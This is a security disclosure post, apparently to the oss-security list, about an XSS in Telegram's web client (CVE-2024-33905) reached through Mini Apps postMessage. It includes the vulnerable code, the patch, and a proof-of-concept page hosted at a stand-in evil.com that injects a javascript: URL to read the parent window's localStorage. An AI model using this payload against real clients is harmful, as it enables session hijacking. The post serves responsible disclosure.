CVE-2024-33905 On Sun, Apr 28, 2024 at 5:59 PM Pedro Batista <pedba...@gmail.com> wrote:
> Hi oss-security, > I would like to share a vulnerability I reported on Telegram Web > application which is Open Source (https://github.com/morethanwords/tweb). > The vulnerability is a XSS that can be exploited to achieve session > hijacking with 1-click using Telegram Mini Apps. > > I reported the vulnerability on March 9th, 2024 and Telegram promptly > fixed it on March 11th, 2024. > > # Vulnerable version: Telegram WebK 2.0.0 (486) and below > # Fixed version: Telegram WebK 2.0.0 (488) > > # Attack Surface > ## Telegram Mini Apps > “Telegram Mini Apps are essentially web applications that you can run > directly within the Telegram messenger interface. Mini Apps support > seamless authorization, integrated crypto and fiat payments (via Google Pay > and Apple Pay), tailored push notifications, and more.” > > > https://core.telegram.org/bots/webapps > > https://ton.org/mini-apps > > Is important to highlight that this feature is heavily used for crypto > payments in the TON Blockchain. > > # Static Analysis > A cached version of the vulnerable file can be found here: > - https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js > > ``` > telegramWebView.addMultipleEventsListeners({ > // [...] > web_app_open_link:({url:t})=>{window.open(t,"_blank")} > } > ``` > The vulnerability was triggered with `postMessage` communication by > abusing the event `web_app_open_link` which allowed a new URL to remain > with the javascript context of the parent window using the `javascript:` > scheme as XSS payload. > > # Weaponized Setup > 1. Attacker creates a Bot + Mini App > 2. Sets the URL of the Mini App => https://evil.com/homepage.html > 3. The exploit will be hosted in the homepage of the attacker’s site > 3.1. homepage.html > ``` > <body onload=exploit()> > <script> > function exploit() { > window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link', > eventData: {url: > "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*'); } > </script> > </body> > ``` > > # Telegram Patch Commit > > https://github.com/morethanwords/tweb/commit/2153ea9878668769faac8dd5931b7e0b96a9f129/src/components/popups/webApp.ts > > ``` > export default function > safeWindowOpen(url: string) { > window.open(url, '_blank', 'noreferrer'); > } > ``` > > # Demo > I have published a writeup for this finding which includes the Exploit > Demo, it's available here: > > > https://medium.com/@pedbap/telegram-web-app-xss-session-hijacking-1-click-95acccdc8d90 > > I recently requested a CVE for this vulnerability as well, looking forward > to updating the thread as soon as it is issued. > > Thanks for looking into my report. > > Best regards, > Pedro Baptista >
